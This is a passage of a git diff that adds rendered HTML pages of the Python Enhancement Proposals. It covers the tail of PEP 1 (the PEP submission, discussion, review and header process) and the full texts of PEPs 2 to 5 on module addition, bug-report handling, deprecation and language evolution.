Following the above initial discussion, the workflow varies based on whether +any of the PEP’s co-authors are core developers. If one or more of the PEP’s +co-authors are core developers, they are responsible for following the process +outlined below. Otherwise (i.e. none of the co-authors are core developers), +then the PEP author(s) will need to find a sponsor for the PEP.

+

Ideally, a core developer sponsor is identified, but non-core sponsors may also +be selected with the approval of the Steering Council. Members of the GitHub +“PEP editors” team and members of the Typing Council (PEP 729) are +pre-approved to be sponsors. The sponsor’s job is to +provide guidance to the PEP author to help them through the logistics of the +PEP process (somewhat acting like a mentor). Being a sponsor does not +disqualify that person from becoming a co-author or PEP-Delegate later on (but +not both). The sponsor of a PEP is recorded in the “Sponsor:” field of the +header.

+

Once the sponsor or the core developer(s) co-authoring the PEP deem the PEP +ready for submission, the proposal should be submitted as a draft PEP via a +GitHub pull request. The draft must be written in PEP style as described +below, else it will fail review immediately (although minor errors may be +corrected by the editors).

+

The standard PEP workflow is:

+
    +
  • You, the PEP author, fork the PEP repository, and create a file named +pep-NNNN.rst that contains your new PEP. NNNN should be the next +available PEP number not used by a published or in-PR PEP.
  • +
  • In the “PEP:” header field, enter the PEP number that matches your filename +as your draft PEP number.
  • +
  • In the “Type:” header field, enter “Standards Track”, +“Informational”, or “Process” as appropriate, and for the “Status:” +field enter “Draft”. For full details, see PEP Header Preamble.
  • +
  • Update .github/CODEOWNERS such that any co-author(s) or sponsors +with write access to the PEP repository are listed for your new file. +This ensures any future pull requests changing the file will be assigned +to them.
  • +
  • Push this to your GitHub fork and submit a pull request.
  • +
  • The PEP editors review your PR for structure, formatting, and other +errors. For a reST-formatted PEP, PEP 12 is provided as a template. +It also provides a complete introduction to reST markup that is used +in PEPs. Approval criteria are:
      +
    • It is sound and complete. The ideas must make technical sense. The +editors do not consider whether they seem likely to be accepted.
    • +
    • The title accurately describes the content.
    • +
    • The PEP’s language (spelling, grammar, sentence structure, etc.) +and code style (examples should match PEP 7 & PEP 8) should be +correct and conformant. The PEP text will be automatically checked for +correct reStructuredText formatting when the pull request is submitted. +PEPs with invalid reST markup will not be approved.
    • +
    +

    Editors are generally quite lenient about this initial review, +expecting that problems will be corrected by the reviewing process. +Note: Approval of the PEP is no guarantee that there are no +embarrassing mistakes! Correctness is the responsibility of authors +and reviewers, not the editors.

    +

    If the PEP isn’t ready for approval, an editor will send it back to +the author for revision, with specific instructions.

    +
  • +
  • Once approved, they will assign your PEP a number.
  • +
+

Once the review process is complete, and the PEP editors approve it (note that +this is not the same as accepting your PEP!), they will squash commit your +pull request onto main.

+

The PEP editors will not unreasonably deny publication of a PEP. Reasons for +denying PEP status include duplication of effort, being technically unsound, +not providing proper motivation or addressing backwards compatibility, or not +in keeping with the Python philosophy. The Steering Council can be consulted +during the approval phase, and are the final arbiter of a draft’s PEP-ability.

+

Developers with write access to the PEP repository may claim PEP +numbers directly by creating and committing a new PEP. When doing so, the +developer must handle the tasks that would normally be taken care of by the +PEP editors (see PEP Editor Responsibilities & Workflow). This includes +ensuring the initial version meets the expected standards for submitting a +PEP. Alternately, even developers should submit PEPs via pull request. +When doing so, you are generally expected to handle the process yourself; +if you need assistance from PEP editors, mention @python/pep-editors +on GitHub.

+

As updates are necessary, the PEP author can check in new versions if they +(or a collaborating developer) have write access to the PEP repository. +Getting a PEP number assigned early can be useful for ease of +reference, especially when multiple draft PEPs are being considered at the +same time.

+

Standards Track PEPs consist of two parts, a design document and a +reference implementation. It is generally recommended that at least a +prototype implementation be co-developed with the PEP, as ideas that sound +good in principle sometimes turn out to be impractical when subjected to the +test of implementation.

+
+
+

Discussing a PEP

+

As soon as a PEP number has been assigned +and the draft PEP is committed to the PEP repository, +a discussion thread for the PEP should be created +to provide a central place to discuss and review its contents, and the +PEP should be updated so that the Discussions-To header links to it.

+

The PEP authors (or sponsor, if applicable) may select any reasonable venue +for the discussion, so long as the the following criteria are met:

+
    +
  • The forum is appropriate to the PEP’s topic.
  • +
  • The thread is publicly available on the web so that all interested parties +can participate.
  • +
  • The discussion is subject to the Python Community Code of Conduct.
  • +
  • A direct link to the current discussion thread is provided in the PEP +under the Discussions-To header.
  • +
+

The PEPs category of the Python Discourse +is the preferred choice for most new PEPs, +whereas historically the Python-Dev mailing list was commonly used. +Some specialized topics have specific venues, such as +the Typing category and the Packaging category on the Python +Discourse for typing and packaging PEPs, respectively. +If the PEP authors are unsure of the best venue, +the PEP Sponsor and PEP editors can advise them accordingly.

+

If a PEP undergoes a significant re-write or other major, substantive +changes to its proposed specification, a new thread should typically be created +in the chosen venue to solicit additional feedback. If this occurs, the +Discussions-To link must be updated and a new Post-History entry added +pointing to this new thread.

+

If it is not chosen as the discussion venue, +a brief announcement post should be made to the PEPs category +with at least a link to the rendered PEP and the Discussions-To thread +when the draft PEP is committed to the repository +and if a major-enough change is made to trigger a new thread.

+

PEP authors are responsible for collecting community feedback on a PEP +before submitting it for review. However, to avoid long-winded and +open-ended discussions, strategies such as soliciting private or more +narrowly-tailored feedback in the early design phase, +collaborating with other community members with expertise in the PEP’s +subject matter, and picking an appropriately-specialized discussion for the +PEP’s topic (if applicable) should be considered. +PEP authors should use their discretion here.

+

Once the PEP is assigned a number and committed to the PEP repository, +substantive issues should generally be discussed on the canonical public +thread, as opposed to private channels, GitHub pull request reviews or +unrelated venues. This ensures everyone can follow and contribute, +avoids fragmenting the discussion, +and makes sure it is fully considered as part of the PEP review process. +Comments, support, concerns and other feedback on this designated thread +are a critical part of what the Steering Council or PEP-Delegate will +consider when reviewing the PEP.

+
+
+

PEP Review & Resolution

+

Once the authors have completed a PEP, they may request a review for +style and consistency from the PEP editors. +However, content review and acceptance of the PEP is ultimately the +responsibility of the Steering Council, which is formally initiated by +opening a Steering Council issue once the authors (and sponsor, if any) +determine the PEP is ready for final review and resolution.

+

To expedite the process in selected cases (e.g. when a change is clearly +beneficial and ready to be accepted, but the PEP hasn’t been formally submitted +for review yet), the Steering Council may also initiate a PEP review, first +notifying the PEP author(s) and giving them a chance to make revisions.

+

The final authority for PEP approval is the Steering Council. However, whenever +a new PEP is put forward, any core developer who believes they are suitably +experienced to make the final decision on that PEP may offer to serve as its +PEP-Delegate by notifying the Steering Council +of their intent. If the Steering Council approves their offer, +the PEP-Delegate will then have the authority to approve or reject that PEP. +For PEPs related to the Python type system, the Typing Council (PEP 729) +provides a recommendation to the Steering Council. To request such a +recommendation, open an issue on the Typing Council issue tracker.

+

The term “PEP-Delegate” is used under the Steering Council governance model +for the PEP’s designated decision maker, +who is recorded in the “PEP-Delegate” field in the PEP’s header. +The term “BDFL-Delegate” is a deprecated alias for PEP-Delegate, a legacy of +the time when when Python was led by a BDFL. +Any legacy references to “BDFL-Delegate” should be treated as equivalent to +“PEP-Delegate”.

+

An individual offering to nominate themselves as a PEP-Delegate must notify +the relevant authors and (when present) the sponsor for the PEP, and submit +their request to the Steering Council +(which can be done via a new issue ). +Those taking on this responsibility are free to seek +additional guidance from the Steering Council at any time, and are also expected +to take the advice and perspectives of other core developers into account.

+

The Steering Council will generally approve such self-nominations by default, +but may choose to decline them. +Possible reasons for the Steering Council declining a +self-nomination as PEP-Delegate include, but are not limited to, perceptions of +a potential conflict of interest (e.g. working for the same organisation as the +PEP submitter), or simply considering another potential PEP-Delegate to be +more appropriate. If core developers (or other community members) have concerns +regarding the suitability of a PEP-Delegate for any given PEP, they may ask +the Steering Council to review the delegation.

+

If no volunteer steps forward, then the Steering Council will approach core +developers (and potentially other Python community members) with relevant +expertise, in an attempt to identify a candidate that is willing to serve as +PEP-Delegate for that PEP. If no suitable candidate can be found, then the +PEP will be marked as Deferred until one is available.

+

Previously appointed PEP-Delegates may choose to step down, or be asked to step +down by the Council, in which case a new PEP-Delegate will be appointed in the +same manner as for a new PEP (including deferral of the PEP if no suitable +replacement can be found). In the event that a PEP-Delegate is asked to step +down, this will overrule any prior acceptance or rejection of the PEP, and it +will revert to Draft status.

+

When such standing delegations are put in place, the Steering Council will +maintain sufficient public records to allow subsequent Councils, the core +developers, and the wider Python community to understand the delegations that +currently exist, why they were put in place, and the circumstances under which +they may no longer be needed.

+

For a PEP to be accepted it must meet certain minimum criteria. It +must be a clear and complete description of the proposed enhancement. +The enhancement must represent a net improvement. The proposed +implementation, if applicable, must be solid and must not complicate +the interpreter unduly. Finally, a proposed enhancement must be +“pythonic” in order to be accepted by the Steering Council. (However, +“pythonic” is an imprecise term; it may be defined as whatever is acceptable to +the Steering Council. This logic is intentionally circular.) See PEP 2 +for standard library module acceptance criteria.

+

Except where otherwise approved by the Steering Council, +pronouncements of PEP resolution will be posted to the +PEPs category on the Python Discourse.

+

Once a PEP has been accepted, the reference implementation must be +completed. When the reference implementation is complete and incorporated +into the main source code repository, the status will be changed to “Final”.

+

To allow gathering of additional design and interface feedback before committing +to long term stability for a language feature or standard library API, a PEP +may also be marked as “Provisional”. This is short for “Provisionally Accepted”, +and indicates that the proposal has been accepted for inclusion in the reference +implementation, but additional user feedback is needed before the full design +can be considered “Final”. Unlike regular accepted PEPs, provisionally accepted +PEPs may still be Rejected or Withdrawn even after the related changes have +been included in a Python release.

+

Wherever possible, it is considered preferable to reduce the scope of a proposal +to avoid the need to rely on the “Provisional” status (e.g. by deferring some +features to later PEPs), as this status can lead to version compatibility +challenges in the wider Python ecosystem. PEP 411 provides additional details +on potential use cases for the Provisional status.

+

A PEP can also be assigned the status “Deferred”. The PEP author or an +editor can assign the PEP this status when no progress is being made +on the PEP. Once a PEP is deferred, a PEP editor can reassign it +to draft status.

+

A PEP can also be “Rejected”. Perhaps after all is said and done it +was not a good idea. It is still important to have a record of this +fact. The “Withdrawn” status is similar - it means that the PEP author +themselves has decided that the PEP is actually a bad idea, or has +accepted that a competing proposal is a better alternative.

+

When a PEP is Accepted, Rejected or Withdrawn, the PEP should be updated +accordingly. In addition to updating the Status field, at the very least +the Resolution header should be added with a direct link +to the relevant post making a decision on the PEP.

+

PEPs can also be superseded by a different PEP, rendering the original +obsolete. This is intended for Informational PEPs, where version 2 of +an API can replace version 1.

+

The possible paths of the status of PEPs are as follows:

+PEP process flow diagram +

While not shown in the diagram, “Accepted” PEPs may technically move to +“Rejected” or “Withdrawn” even after acceptance. This will only occur if +the implementation process reveals fundamental flaws in the design that were +not noticed prior to acceptance of the PEP. Unlike Provisional PEPs, these +transitions are only permitted if the accepted proposal has not been included +in a Python release - released changes must instead go through the regular +deprecation process (which may require a new PEP providing the rationale for +the deprecation).

+

Some Informational and Process PEPs may also have a status of “Active” +if they are never meant to be completed. E.g. PEP 1 (this PEP).

+
+
+

PEP Maintenance

+

In general, PEPs are no longer substantially modified after they have reached +the Accepted, Final, Rejected or Superseded state. Once resolution is reached, +a PEP is considered a historical document rather than a living specification. +Formal documentation of the expected behavior should be maintained elsewhere, +such as the Language Reference for core features, the Library Reference +for standard library modules or the PyPA Specifications for packaging.

+

If changes based on implementation experience and user feedback are made to +Standards track PEPs while in the Provisional or (with SC approval) Accepted +state, they should be noted in the PEP, such that the PEP accurately describes +the implementation at the point where it is marked Final.

+

Active (Informational and Process) PEPs may be updated over time to reflect +changes to development practices and other details. The precise process +followed in these cases will depend on the nature and purpose of the PEP +in question.

+

Occasionally, a Deferred or even a Withdrawn PEP may be resurrected +with major updates, but it is often better to just propose a new one.

+
+
+
+

What belongs in a successful PEP?

+

Each PEP should have the following parts/sections:

+
    +
  1. Preamble – RFC 2822 style headers containing meta-data about the +PEP, including the PEP number, a short descriptive title (limited +to a maximum of 44 characters), the names, and optionally the +contact info for each author, etc.
  2. +
  3. Abstract – a short (~200 word) description of the technical issue +being addressed.
  4. +
  5. Motivation – The motivation is critical for PEPs that want to +change the Python language, library, or ecosystem. It should +clearly explain why the existing language specification is +inadequate to address the problem that the PEP solves. This can +include collecting documented support for the PEP from important +projects in the Python ecosystem. PEP submissions without +sufficient motivation may be rejected.
  6. +
  7. Rationale – The rationale fleshes out the specification by +describing why particular design decisions were made. It should +describe alternate designs that were considered and related work, +e.g. how the feature is supported in other languages.

    The rationale should provide evidence of consensus within the +community and discuss important objections or concerns raised +during discussion.

    +
  8. +
  9. Specification – The technical specification should describe the +syntax and semantics of any new language feature. The +specification should be detailed enough to allow competing, +interoperable implementations for at least the current major Python +platforms (CPython, Jython, IronPython, PyPy).
  10. +
  11. Backwards Compatibility – All PEPs that introduce backwards +incompatibilities must include a section describing these +incompatibilities and their severity. The PEP must explain how the +author proposes to deal with these incompatibilities. PEP +submissions without a sufficient backwards compatibility treatise +may be rejected outright.
  12. +
  13. Security Implications – If there are security concerns in relation +to the PEP, those concerns should be explicitly written out to make +sure reviewers of the PEP are aware of them.
  14. +
  15. How to Teach This – For a PEP that adds new functionality or changes +language behavior, it is helpful to include a section on how to +teach users, new and experienced, how to apply the PEP to their +work.

    This section may include key points and recommended documentation +changes that would help users adopt a new feature or migrate their +code to use a language change.

    +
  16. +
  17. Reference Implementation – The reference implementation must be +completed before any PEP is given status “Final”, but it need not +be completed before the PEP is accepted. While there is merit +to the approach of reaching consensus on the specification and +rationale before writing code, the principle of “rough consensus +and running code” is still useful when it comes to resolving many +discussions of API details.

    The final implementation must include test code and documentation +appropriate for either the Python language reference or the +standard library reference.

    +
  18. +
  19. Rejected Ideas – Throughout the discussion of a PEP, various ideas +will be proposed which are not accepted. Those rejected ideas should +be recorded along with the reasoning as to why they were rejected. +This both helps record the thought process behind the final version +of the PEP as well as preventing people from bringing up the same +rejected idea again in subsequent discussions.

    In a way this section can be thought of as a breakout section of the +Rationale section that is focused specifically on why certain ideas +were not ultimately pursued.

    +
  20. +
  21. Open Issues – While a PEP is in draft, ideas can come up which +warrant further discussion. Those ideas should be recorded so people +know that they are being thought about but do not have a concrete +resolution. This helps make sure all issues required for the PEP to be +ready for consideration are complete and reduces people duplicating +prior discussion.
  22. +
  23. Footnotes – A collection of footnotes cited in the PEP, and +a place to list non-inline hyperlink targets.
  24. +
  25. Copyright/license – Each new PEP must be placed under a dual license of +public domain and CC0-1.0-Universal (see this PEP for an example).
  26. +
+
+
+

PEP Formats and Templates

+

PEPs are UTF-8 encoded text files using the reStructuredText format. +reStructuredText allows for rich markup that is still quite easy to +read, but also results in good-looking and functional HTML. PEP 12 +contains instructions and a PEP template.

+

The PEP text files are automatically +converted to HTML +(via a Sphinx-based build system) +for easier online reading.

+
+
+

PEP Header Preamble

+

Each PEP must begin with an RFC 2822 style header preamble. The headers +must appear in the following order. Headers marked with “*” are +optional and are described below. All other headers are required.

+
  PEP: <pep number>
+  Title: <pep title>
+  Author: <list of authors' names and optionally, email addrs>
+* Sponsor: <name of sponsor>
+* PEP-Delegate: <PEP delegate's name>
+  Discussions-To: <URL of current canonical discussion thread>
+  Status: <Draft | Active | Accepted | Provisional | Deferred | Rejected |
+           Withdrawn | Final | Superseded>
+  Type: <Standards Track | Informational | Process>
+* Topic: <Governance | Packaging | Release | Typing>
+* Requires: <pep numbers>
+  Created: <date created on, in dd-mmm-yyyy format>
+* Python-Version: <version number>
+  Post-History: <dates, in dd-mmm-yyyy format,
+                 inline-linked to PEP discussion threads>
+* Replaces: <pep number>
+* Superseded-By: <pep number>
+* Resolution: <date in dd-mmm-yyyy format, linked to the acceptance/rejection post>
+
+
+

The Author header lists the names, and optionally the email addresses +of all the authors/owners of the PEP. The format of the Author header +values must be:

+
Random J. User <random@example.com>
+
+
+

if the email address is included, and just:

+
Random J. User
+
+
+

if the address is not given. Most PEP authors use their real name, but +if you prefer a different name and use it consistently in discussions +related to the PEP, feel free to use it here.

+

If there are multiple authors, each should be on a separate line +following RFC 2822 continuation line conventions. Note that personal +email addresses in PEPs will be obscured as a defense against spam +harvesters.

+

The Sponsor field records which developer (core, or otherwise approved by the +Steering Council) is sponsoring the PEP. If one of the authors of the PEP is a +core developer then no sponsor is necessary and thus this field should be left +out.

+

The PEP-Delegate field is used to record the individual appointed by the +Steering Council to make the final decision on whether or not to approve or +reject a PEP.

+

Note: The Resolution header is required for Standards Track PEPs +only. It contains a URL that should point to an email message or +other web resource where the pronouncement about +(i.e. approval or rejection of) the PEP is made.

+

The Discussions-To header provides the URL to the current +canonical discussion thread for the PEP. +For email lists, this should be a direct link to the thread in the list’s +archives, rather than just a mailto: or hyperlink to the list itself.

+

The Type header specifies the type of PEP: Standards Track, +Informational, or Process.

+

The optional Topic header lists the special topic, if any, +the PEP belongs under. +See the Topic Index for the existing topics.

+

The Created header records the date that the PEP was assigned a +number, while Post-History is used to record the dates of and corresponding +URLs to the Discussions-To threads for the PEP, with the former as the +linked text, and the latter as the link target. +Both sets of dates should be in dd-mmm-yyyy format, e.g. 14-Aug-2001.

+

Standards Track PEPs will typically have a Python-Version header which +indicates the version of Python that the feature will be released with. +Standards Track PEPs without a Python-Version header indicate +interoperability standards that will initially be supported through +external libraries and tools, and then potentially supplemented by a later PEP +to add support to the standard library. Informational and Process PEPs do +not need a Python-Version header.

+

PEPs may have a Requires header, indicating the PEP numbers that this +PEP depends on.

+

PEPs may also have a Superseded-By header indicating that a PEP has +been rendered obsolete by a later document; the value is the number of +the PEP that replaces the current document. The newer PEP must have a +Replaces header containing the number of the PEP that it rendered +obsolete.

+
+
+

Auxiliary Files

+

PEPs may include auxiliary files such as diagrams. Such files should be +named pep-XXXX-Y.ext, where “XXXX” is the PEP number, “Y” is a +serial number (starting at 1), and “ext” is replaced by the actual +file extension (e.g. “png”).

+

Alternatively, all support files may be placed in a subdirectory called +pep-XXXX, where “XXXX” is the PEP number. When using a subdirectory, there +are no constraints on the names used in files.

+
+
+

Changing Existing PEPs

+

Draft PEPs are freely open for discussion and proposed modification, at the +discretion of the authors, until submitted to the Steering Council or +PEP-Delegate for review and resolution. Substantive content changes should +generally be first proposed on the PEP’s discussion thread listed in its +Discussions-To header, while copyedits and corrections can be submitted +as a GitHub issue or GitHub pull request. +PEP authors with write access to the PEP repository can update the PEPs +themselves by using git push or a GitHub PR to submit their changes. +For guidance on modifying other PEPs, consult the PEP Maintenance section.

+

See the Contributing Guide for additional details, and when in doubt, +please check first with the PEP author and/or a PEP editor.

+
+
+

Transferring PEP Ownership

+

It occasionally becomes necessary to transfer ownership of PEPs to a +new champion. In general, it is preferable to retain the original author as +a co-author of the transferred PEP, but that’s really up to the +original author. A good reason to transfer ownership is because the +original author no longer has the time or interest in updating it or +following through with the PEP process, or has fallen off the face of +the ‘net (i.e. is unreachable or not responding to email). A bad +reason to transfer ownership is because the author doesn’t agree with the +direction of the PEP. One aim of the PEP process is to try to build +consensus around a PEP, but if that’s not possible, an author can always +submit a competing PEP.

+

If you are interested in assuming ownership of a PEP, you can also do this via +pull request. Fork the PEP repository, make your ownership modification, +and submit a pull request. You should mention both the original author and +@python/pep-editors in a comment on the pull request. (If the original +author’s GitHub username is unknown, use email.) If the original author +doesn’t respond in a timely manner, the PEP editors will make a +unilateral decision (it’s not like such decisions can’t be reversed :).

+
+
+

PEP Editor Responsibilities & Workflow

+

A PEP editor must be added to the @python/pep-editors group on GitHub and +must watch the PEP repository.

+

Note that developers with write access to the PEP repository may +handle the tasks that would normally be taken care of by the PEP editors. +Alternately, even developers may request assistance from PEP editors by +mentioning @python/pep-editors on GitHub.

+

For each new PEP that comes in an editor does the following:

+
    +
  • Make sure that the PEP is either co-authored by a core developer, has a core +developer as a sponsor, or has a sponsor specifically approved for this PEP +by the Steering Council.
  • +
  • Read the PEP to check if it is ready: sound and complete. The ideas +must make technical sense, even if they don’t seem likely to be +accepted.
  • +
  • The title should accurately describe the content.
  • +
  • The file name extension is correct (i.e. .rst).
  • +
  • Ensure that everyone listed as a sponsor or co-author of the PEP who has write +access to the PEP repository is added to .github/CODEOWNERS.
  • +
  • Skim the PEP for obvious defects in language (spelling, grammar, +sentence structure, etc.), and code style (examples should conform to +PEP 7 & PEP 8). Editors may correct problems themselves, but are +not required to do so (reStructuredText syntax is checked by the repo’s CI).
  • +
  • If a project is portrayed as benefiting from or supporting the PEP, make sure +there is some direct indication from the project included to make the support +clear. This is to avoid a PEP accidentally portraying a project as supporting +a PEP when in fact the support is based on conjecture.
  • +
+

If the PEP isn’t ready, an editor will send it back to the author for +revision, with specific instructions. If reST formatting is a +problem, ask the author(s) to use PEP 12 as a template and resubmit.

+

Once the PEP is ready for the repository, a PEP editor will:

+
    +
  • Check that the author has selected a valid PEP number or assign them a +number if they have not (almost always just the next available number, but +sometimes it’s a special/joke number, like 666 or 3141).

    Remember that numbers below 100 are meta-PEPs.

    +
  • +
  • Check that the author has correctly labeled the PEP’s type +(“Standards Track”, “Informational”, or “Process”), and marked its +status as “Draft”.
  • +
  • Ensure all CI build and lint checks pass without errors, +and there are no obvious issues in the rendered preview output.
  • +
  • Merge the new (or updated) PEP.
  • +
  • Inform the author of the next steps (open a discussion thread and +update the PEP with it, post an announcement, etc).
  • +
+

Updates to existing PEPs should be submitted as a GitHub pull request.

+

Many PEPs are written and maintained by developers with write access +to the Python codebase. The PEP editors monitor the PEP repository +for changes, and correct any structure, grammar, spelling, or +markup mistakes they see.

+

PEP editors don’t pass judgment on PEPs. They merely do the +administrative & editorial part (which is generally a low volume task).

+

Resources:

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0001.rst

+

Last modified: 2024-10-17 13:14:44 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0002/index.html b/pep-0002/index.html new file mode 100644 index 00000000000..2788317dc11 --- /dev/null +++ b/pep-0002/index.html @@ -0,0 +1,171 @@ + + + + + + + + PEP 2 – Procedure for Adding New Modules | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 2 – Procedure for Adding New Modules

+
+
Author:
+
Brett Cannon <brett at python.org>, +Martijn Faassen <faassen at infrae.com>
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
07-Jul-2001
+
Post-History:
+
07-Jul-2001, 09-Mar-2002
+
+
+
+
Table of Contents +
+
+

Introduction

+

The Python Standard Library contributes significantly to Python’s +success. The language comes with “batteries included”, so it is easy +for people to become productive with just the standard library alone. +It is therefore important that the usefulness of the standard library +be maintained.

+

Due to the visibility and importance of the standard library, it must +be maintained thoughtfully. As such, any code within it must be +maintained by Python’s development team which leads to a perpetual +cost to each addition made. There is also added cognitive load for +users in familiarizing themselves with what is in the standard +library to be considered.

+

New functionality is commonly added to the library in the form of new +modules. This PEP will describe the procedure for the addition of +new modules. PEP 4 deals with procedures for deprecation of modules; +the removal of old and unused modules from the standard library.

+
+
+

Acceptance Procedure

+

For top-level modules/packages, a PEP is required. The procedure for +writing a PEP is covered in PEP 1.

+

For submodules of a preexisting package in the standard library, +additions are at the discretion of the general Python development team +and its members.

+

General guidance on what modules typically are accepted into the +standard library, the overall process, etc. are covered in the +developer’s guide.

+
+
+

Maintenance Procedure

+

Anything accepted into the standard library is expected to be +primarily maintained there, within Python’s development infrastructure. +While some members of the development team may choose to maintain a +backport of a module outside of the standard library, it is up to them +to keep their external code in sync as appropriate.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0002.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0003/index.html b/pep-0003/index.html new file mode 100644 index 00000000000..65dbc1d421f --- /dev/null +++ b/pep-0003/index.html @@ -0,0 +1,176 @@ + + + + + + + + PEP 3 – Guidelines for Handling Bug Reports | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3 – Guidelines for Handling Bug Reports

+
+
Author:
+
Jeremy Hylton <jeremy at alum.mit.edu>
+
Status:
+
Withdrawn
+
Type:
+
Process
+
Created:
+
25-Sep-2000
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Important

+

This PEP has been withdrawn.

+

×

+

This PEP contained guidelines for handling bug reports in the Python +bug tracker. It has been replaced by the +Developer’s Guide description of issue triaging. +Guidelines for people submitting Python bugs are in the Python docs.

+

+
+
+

Original Guidelines

+
    +
  1. Make sure the bug category and bug group are correct. If they are +correct, it is easier for someone interested in helping to find +out, say, what all the open Tkinter bugs are.
  2. +
  3. If it’s a minor feature request that you don’t plan to address +right away, add it to PEP 42 or ask the owner to add it for you. +If you add the bug to PEP 42, mark the bug as “feature request”, +“later”, and “closed”; and add a comment to the bug saying that +this is the case (mentioning the PEP explicitly).
    +
    XXX do we prefer the tracker or PEP 42?
    +
    +
    +
    +
  4. +
  5. Assign the bug a reasonable priority. We don’t yet have a clear +sense of what each priority should mean. One rule, however, is +that bugs with priority “urgent” or higher must be fixed before +the next release.
  6. +
  7. If a bug report doesn’t have enough information to allow you to +reproduce or diagnose it, ask the original submitter for more +information. If the original report is really thin and your email +doesn’t get a response after a reasonable waiting period, you can +close the bug.
  8. +
  9. If you fix a bug, mark the status as “Fixed” and close it. In the +comments, include the SVN revision numbers of the commit(s). In +the SVN checkin message, include the issue number and a +normal description of the change, mentioning the contributor if a +patch was applied.
  10. +
  11. If you are assigned a bug that you are unable to deal with, assign +it to someone else if you think they will be able to deal with it, +otherwise it’s probably best to unassign it.
  12. +
+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0003.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0004/index.html b/pep-0004/index.html new file mode 100644 index 00000000000..7aa88fdac57 --- /dev/null +++ b/pep-0004/index.html @@ -0,0 +1,152 @@ + + + + + + + + PEP 4 – Deprecation of Standard Modules | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 4 – Deprecation of Standard Modules

+
+
Author:
+
Brett Cannon <brett at python.org>, Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
01-Oct-2000
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

When new modules were added to the standard Python library in the +past, it was not possible to foresee whether they would still be +useful in the future. Even though Python “Comes With Batteries +Included”, batteries may discharge over time. Carrying old modules +around is a burden on the maintainer, especially when there is no +interest in the module anymore.

+

At the same time, removing a module from the distribution is +difficult, as it is not known in general whether anybody is still +using it. This PEP defines a procedure for removing modules from the +standard Python library. Usage of a module may be ‘deprecated’, which +means that it may be removed from a future Python release.

+
+
+

Procedure for declaring a module deprecated

+

To remove a top-level module/package from the standard library, a PEP +is required. The deprecation process is outlined in PEP 387.

+

For removing a submodule of a package in the standard library, +PEP 387 must be followed, but a PEP is not required.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0004.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0005/index.html b/pep-0005/index.html new file mode 100644 index 00000000000..f441f1950ea --- /dev/null +++ b/pep-0005/index.html @@ -0,0 +1,186 @@ + + + + + + + + PEP 5 – Guidelines for Language Evolution | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 5 – Guidelines for Language Evolution

+
+
Author:
+
Paul Prescod <paul at prescod.net>
+
Status:
+
Superseded
+
Type:
+
Process
+
Created:
+
26-Oct-2000
+
Post-History:
+

+
Superseded-By:
+
387
+
+
+
+
Table of Contents +
+
+

Abstract

+

In the natural evolution of programming languages it is sometimes +necessary to make changes that modify the behavior of older programs. +This PEP proposes a policy for implementing these changes in a manner +respectful of the installed base of Python users.

+
+
+

Implementation Details

+

Implementation of this PEP requires the addition of a formal warning +and deprecation facility that will be described in another proposal.

+
+
+

Scope

+

These guidelines apply to future versions of Python that introduce +backward-incompatible behavior. Backward incompatible behavior is a +major deviation in Python interpretation from an earlier behavior +described in the standard Python documentation. Removal of a feature +also constitutes a change of behavior.

+

This PEP does not replace or preclude other compatibility strategies +such as dynamic loading of backwards-compatible parsers. On the other +hand, if execution of “old code” requires a special switch or pragma +then that is indeed a change of behavior from the point of view of the +user and that change should be implemented according to these +guidelines.

+

In general, common sense must prevail in the implementation of these +guidelines. For instance changing “sys.copyright” does not constitute +a backwards-incompatible change of behavior!

+
+
+

Steps For Introducing Backwards-Incompatible Features

+
    +
  1. Propose backwards-incompatible behavior in a PEP. The PEP must +include a section on backwards compatibility that describes in +detail a plan to complete the remainder of these steps.
  2. +
  3. Once the PEP is accepted as a productive direction, implement an +alternate way to accomplish the task previously provided by the +feature that is being removed or changed. For instance if the +addition operator were scheduled for removal, a new version of +Python could implement an “add()” built-in function.
  4. +
  5. Formally deprecate the obsolete construct in the Python +documentation.
  6. +
  7. Add an optional warning mode to the parser that will inform users +when the deprecated construct is used. In other words, all +programs that will behave differently in the future must trigger +warnings in this mode. Compile-time warnings are preferable to +runtime warnings. The warning messages should steer people from +the deprecated construct to the alternative construct.
  8. +
  9. There must be at least a one-year transition period between the +release of the transitional version of Python and the release of +the backwards incompatible version. Users will have at least a +year to test their programs and migrate them from use of the +deprecated construct to the alternative one.
  10. +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0005.rst

+

Last modified: 2023-11-28 14:46:07 GMT

+ +
+ +
